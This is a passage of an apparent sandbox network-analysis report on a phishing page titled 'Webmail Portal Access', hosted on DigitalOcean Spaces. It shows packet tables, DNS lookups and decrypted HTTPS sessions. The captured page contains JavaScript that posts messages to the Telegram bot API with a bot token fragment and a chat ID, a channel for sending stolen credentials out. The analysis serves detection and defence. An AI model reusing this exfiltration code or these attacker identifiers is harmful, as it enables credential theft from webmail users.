Jan 9, 2025 19:29:21.179831982 CET	49761	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:21.179913998 CET	443	49761	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:21.230623960 CET	49761	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:21.230685949 CET	443	49761	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:21.277296066 CET	49761	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:21.426506996 CET	443	49761	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:21.426687956 CET	443	49761	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:21.426882029 CET	49761	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:21.427545071 CET	49761	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:21.427563906 CET	443	49761	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:41.531866074 CET	49892	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:41.531960964 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:41.532063961 CET	49892	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:41.532440901 CET	49892	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:41.532480955 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.153450966 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.158163071 CET	49892	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:42.158227921 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.158750057 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.167546034 CET	49892	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:42.167637110 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.167691946 CET	49892	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:42.211363077 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.215014935 CET	49892	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:42.448448896 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.448671103 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.448730946 CET	49892	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:42.449707985 CET	49892	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:42.449728012 CET	443	49892	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.452771902 CET	49898	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:42.452801943 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:42.452893019 CET	49898	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:42.453126907 CET	49898	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:42.453144073 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:43.066138029 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:43.066416979 CET	49898	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:43.066426039 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:43.066893101 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:43.067353964 CET	49898	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:43.067435026 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:43.067547083 CET	49898	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:43.111326933 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:43.314101934 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:43.314280987 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:29:43.314332008 CET	49898	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:43.314868927 CET	49898	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:29:43.314876080 CET	443	49898	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:04.499624014 CET	50000	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:04.499667883 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:04.499849081 CET	50000	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:04.499952078 CET	50000	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:04.499968052 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.105104923 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.105552912 CET	50000	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:05.105587959 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.105904102 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.106197119 CET	50000	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:05.106259108 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.106338024 CET	50000	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:05.147326946 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.446672916 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.446759939 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.446928024 CET	50000	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:05.447365999 CET	50000	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:05.447390079 CET	443	50000	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.450685978 CET	50001	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:05.450731993 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.450824022 CET	50001	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:05.450998068 CET	50001	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:05.451009035 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:05.481668949 CET	50002	443	192.168.2.5	172.217.16.196
Jan 9, 2025 19:30:05.481702089 CET	443	50002	172.217.16.196	192.168.2.5
Jan 9, 2025 19:30:05.481832981 CET	50002	443	192.168.2.5	172.217.16.196
Jan 9, 2025 19:30:05.481986046 CET	50002	443	192.168.2.5	172.217.16.196
Jan 9, 2025 19:30:05.481995106 CET	443	50002	172.217.16.196	192.168.2.5
Jan 9, 2025 19:30:06.098104000 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:06.098474026 CET	50001	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:06.098511934 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:06.098992109 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:06.099322081 CET	50001	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:06.099400997 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:06.099442959 CET	50001	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:06.143404007 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:06.152508974 CET	50001	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:06.234958887 CET	443	50002	172.217.16.196	192.168.2.5
Jan 9, 2025 19:30:06.235279083 CET	50002	443	192.168.2.5	172.217.16.196
Jan 9, 2025 19:30:06.235300064 CET	443	50002	172.217.16.196	192.168.2.5
Jan 9, 2025 19:30:06.235768080 CET	443	50002	172.217.16.196	192.168.2.5
Jan 9, 2025 19:30:06.236283064 CET	50002	443	192.168.2.5	172.217.16.196
Jan 9, 2025 19:30:06.236356974 CET	443	50002	172.217.16.196	192.168.2.5
Jan 9, 2025 19:30:06.277475119 CET	50002	443	192.168.2.5	172.217.16.196
Jan 9, 2025 19:30:06.444979906 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:06.445086002 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:06.445144892 CET	50001	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:06.462064028 CET	50001	443	192.168.2.5	149.154.167.220
Jan 9, 2025 19:30:06.462091923 CET	443	50001	149.154.167.220	192.168.2.5
Jan 9, 2025 19:30:16.153280973 CET	443	50002	172.217.16.196	192.168.2.5
Jan 9, 2025 19:30:16.153443098 CET	443	50002	172.217.16.196	192.168.2.5
Jan 9, 2025 19:30:16.153513908 CET	50002	443	192.168.2.5	172.217.16.196
Jan 9, 2025 19:30:17.232482910 CET	50002	443	192.168.2.5	172.217.16.196
Jan 9, 2025 19:30:17.232503891 CET	443	50002	172.217.16.196	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 19:29:01.045262098 CET	53	54074	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:01.046356916 CET	53	54247	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:02.106157064 CET	53	61601	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:05.418561935 CET	60095	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:05.418682098 CET	51332	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:05.426001072 CET	53	60095	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:05.426146030 CET	53	51332	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:06.924810886 CET	61711	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:06.924918890 CET	59400	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:06.935169935 CET	53	59400	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:06.936172962 CET	53	61711	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:07.544262886 CET	50856	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:07.544385910 CET	52543	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:07.551815987 CET	53	52543	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:07.552803993 CET	53	50856	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:07.621028900 CET	53	57694	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:08.805471897 CET	53	57113	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:08.822377920 CET	53	61481	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:08.832216024 CET	60091	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:08.832556009 CET	56222	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:08.842376947 CET	53	60091	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:08.844250917 CET	53	56222	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:18.472647905 CET	54518	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:18.473321915 CET	53853	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:18.479552031 CET	53	54518	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:18.494908094 CET	53	53853	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:19.150432110 CET	53	51931	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:20.414987087 CET	50604	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:20.415092945 CET	57713	53	192.168.2.5	1.1.1.1
Jan 9, 2025 19:29:20.421834946 CET	53	50604	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:20.434727907 CET	53	57713	1.1.1.1	192.168.2.5
Jan 9, 2025 19:29:38.036309004 CET	53	54123	1.1.1.1	192.168.2.5
Jan 9, 2025 19:30:00.710395098 CET	53	54445	1.1.1.1	192.168.2.5
Jan 9, 2025 19:30:00.723568916 CET	53	62102	1.1.1.1	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 9, 2025 19:29:20.434789896 CET	192.168.2.5	1.1.1.1	c236	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 19:29:05.418561935 CET	192.168.2.5	1.1.1.1	0xa2a3	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:05.418682098 CET	192.168.2.5	1.1.1.1	0xc426	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 9, 2025 19:29:06.924810886 CET	192.168.2.5	1.1.1.1	0x6282	Standard query (0)	ranprojects0s0wemanin.nyc3.digitaloceanspaces.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:06.924918890 CET	192.168.2.5	1.1.1.1	0xec28	Standard query (0)	ranprojects0s0wemanin.nyc3.digitaloceanspaces.com	65	IN (0x0001)	false
Jan 9, 2025 19:29:07.544262886 CET	192.168.2.5	1.1.1.1	0x78b1	Standard query (0)	stackpath.bootstrapcdn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:07.544385910 CET	192.168.2.5	1.1.1.1	0xf69d	Standard query (0)	stackpath.bootstrapcdn.com	65	IN (0x0001)	false
Jan 9, 2025 19:29:08.832216024 CET	192.168.2.5	1.1.1.1	0xbde9	Standard query (0)	ranprojects0s0wemanin.nyc3.digitaloceanspaces.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:08.832556009 CET	192.168.2.5	1.1.1.1	0xbda7	Standard query (0)	ranprojects0s0wemanin.nyc3.digitaloceanspaces.com	65	IN (0x0001)	false
Jan 9, 2025 19:29:18.472647905 CET	192.168.2.5	1.1.1.1	0x65d7	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:18.473321915 CET	192.168.2.5	1.1.1.1	0x214f	Standard query (0)	api.telegram.org	65	IN (0x0001)	false
Jan 9, 2025 19:29:20.414987087 CET	192.168.2.5	1.1.1.1	0xeefd	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:20.415092945 CET	192.168.2.5	1.1.1.1	0x8608	Standard query (0)	api.telegram.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 19:29:05.426001072 CET	1.1.1.1	192.168.2.5	0xa2a3	No error (0)	www.google.com	172.217.16.196	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:05.426146030 CET	1.1.1.1	192.168.2.5	0xc426	No error (0)	www.google.com		65	IN (0x0001)	false
Jan 9, 2025 19:29:06.936172962 CET	1.1.1.1	192.168.2.5	0x6282	No error (0)	ranprojects0s0wemanin.nyc3.digitaloceanspaces.com	162.243.189.2	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:07.551815987 CET	1.1.1.1	192.168.2.5	0xf69d	No error (0)	stackpath.bootstrapcdn.com		65	IN (0x0001)	false
Jan 9, 2025 19:29:07.552803993 CET	1.1.1.1	192.168.2.5	0x78b1	No error (0)	stackpath.bootstrapcdn.com	104.18.11.207	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:07.552803993 CET	1.1.1.1	192.168.2.5	0x78b1	No error (0)	stackpath.bootstrapcdn.com	104.18.10.207	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:08.842376947 CET	1.1.1.1	192.168.2.5	0xbde9	No error (0)	ranprojects0s0wemanin.nyc3.digitaloceanspaces.com	162.243.189.2	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:18.479552031 CET	1.1.1.1	192.168.2.5	0x65d7	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:29:20.421834946 CET	1.1.1.1	192.168.2.5	0xeefd	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ranprojects0s0wemanin.nyc3.digitaloceanspaces.com

https:

stackpath.bootstrapcdn.com

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	162.243.189.2	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:29:07 UTC	704	OUT	GET /webmail.html HTTP/1.1 Host: ranprojects0s0wemanin.nyc3.digitaloceanspaces.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:29:07 UTC	521	IN	HTTP/1.1 200 OK content-length: 32702 accept-ranges: bytes last-modified: Thu, 02 Jan 2025 22:06:27 GMT x-rgw-object-type: Normal etag: "a82931c016aa1a130cbb50eee3768791" x-amz-request-id: tx00000f93f8a9b104f339a-0067801573-22c6a646-nyc3d content-type: text/html date: Thu, 09 Jan 2025 18:29:07 GMT vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method strict-transport-security: max-age=15552000; includeSubDomains; preload x-envoy-upstream-healthchecked-cluster: connection: close
2025-01-09 18:29:07 UTC	15863	IN	Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0d 0a 20 20 20 0d 0a 20 20 20 20 3c 74 69 74 6c 65 20 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 6e 61 6d 65 22 3e 57 65 62 6d 61 69 6c 20 50 6f 72 74 61 6c 20 41 63 63 65 73 73 3c 2f 74 69 74 6c 65 3e 0d 0a 09 0d 0a 09 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 63 6b 70 61 74 68 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 Data Ascii: <!DOCTYPE html><html><head><html lang="en"><head> ... Required meta tags --> <title class="logoname">Webmail Portal Access</title> <link type="text/css" rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstr
2025-01-09 18:29:07 UTC	16384	IN	Data Raw: 6b 77 65 4c 6f 2b 53 50 36 36 70 4c 64 4a 52 63 2b 6d 38 44 71 4d 55 50 45 52 4d 78 53 4b 41 46 58 6d 49 73 54 76 72 79 74 74 43 4f 37 4f 34 39 59 46 51 61 35 2f 71 4a 63 76 2f 71 4c 62 39 66 58 74 48 57 46 45 62 67 51 35 47 6e 48 31 36 37 68 38 49 66 31 4f 34 63 6c 42 63 4e 34 39 75 70 41 65 4b 50 35 32 42 67 51 6f 6d 30 71 33 6e 53 47 6f 30 71 62 61 35 77 33 41 5a 49 38 4f 54 31 69 43 64 38 31 4f 77 37 53 4b 2b 78 5a 77 67 43 4c 36 74 39 77 64 51 77 56 59 64 78 6e 32 32 34 64 59 35 4f 59 69 4e 44 76 43 48 68 49 6b 45 34 69 44 51 2f 79 44 44 79 55 50 44 53 6c 51 56 36 54 42 6d 68 36 48 39 54 32 52 45 4e 36 77 77 4c 2f 65 58 67 4a 35 55 4c 50 6c 55 70 31 6a 56 38 73 42 49 6e 42 78 4d 73 53 4d 4b 55 4c 54 78 34 4e 52 77 38 46 74 56 70 46 76 55 30 46 34 46 Data Ascii: kweLo+SP66pLdJRc+m8DqMUPERMxSKAFXmIsTvryttCO7O49YFQa5/qJcv/qLb9fXtHWFEbgQ5GnH167h8If1O4clBcN49upAeKP52BgQom0q3nSGo0qba5w3AZI8OT1iCd81Ow7SK+xZwgCL6t9wdQwVYdxn224dY5OYiNDvCHhIkE4iDQ/yDDyUPDSlQV6TBmh6H9T2REN6wwL/eXgJ5ULPlUp1jV8sBInBxMsSMKULTx4NRw8FtVpFvU0F4F
2025-01-09 18:29:07 UTC	455	IN	Data Raw: 49 69 51 46 75 73 72 37 42 59 22 3b 0d 0a 09 09 76 61 72 20 63 68 61 74 5f 69 64 3d 20 22 37 34 36 38 33 30 37 37 33 39 22 3b 0d 0a 09 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 20 3d 20 60 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 24 7b 74 6f 6b 65 6e 7d 2f 73 65 6e 64 4d 65 73 73 61 67 65 60 20 2f 2f 20 54 68 65 20 75 72 6c 20 74 6f 20 72 65 71 75 65 73 74 0d 0a 0d 0a 09 20 20 20 20 63 6f 6e 73 74 20 6f 62 6a 20 3d 20 7b 0d 0a 09 20 20 20 20 20 20 20 20 63 68 61 74 5f 69 64 3a 20 63 68 61 74 5f 69 64 2c 20 0d 0a 09 20 20 20 20 20 20 20 20 74 65 78 74 3a 20 6d 65 73 73 61 67 65 0d 0a 09 20 20 20 20 7d 3b 0d 0a 0d 0a 09 20 20 20 20 63 6f 6e 73 74 20 78 68 74 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 Data Ascii: IiQFusr7BY";var chat_id= "7468307739"; const url = `https://api.telegram.org/bot${token}/sendMessage` // The url to request const obj = { chat_id: chat_id, text: message }; const xht = new XMLHttpReques

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49716	104.18.11.207	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:29:08 UTC	610	OUT	GET /bootstrap/4.5.2/css/bootstrap.min.css HTTP/1.1 Host: stackpath.bootstrapcdn.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:29:08 UTC	952	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:29:08 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close CDN-PullZone: 252412 CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74 CDN-RequestCountryCode: US Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31919000 ETag: W/"816af0eddd3b4822c2756227c7e7b7ee" Last-Modified: Mon, 25 Jan 2021 22:04:11 GMT CDN-ProxyVer: 1.06 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 11/22/2024 23:02:21 CDN-EdgeStorageId: 1067 timing-allow-origin: * cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff CDN-Status: 200 CDN-RequestTime: 0 CDN-RequestId: 8338118a232be829937a6300edbdeedc CDN-Cache: HIT CF-Cache-Status: HIT Age: 972862 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 8ff67db5ac974334-EWR alt-svc: h3=":443"; ma=86400
2025-01-09 18:29:08 UTC	417	IN	Data Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66 Data Ascii: 7bfa/! Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors * Copyright 2011-2020 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--blue:#007bff;--indigo:#6610f
2025-01-09 18:29:08 UTC	1369	IN	Data Raw: 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 Data Ascii: -dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200
2025-01-09 18:29:08 UTC	1369	IN	Data Raw: 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 Data Ascii: decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bott
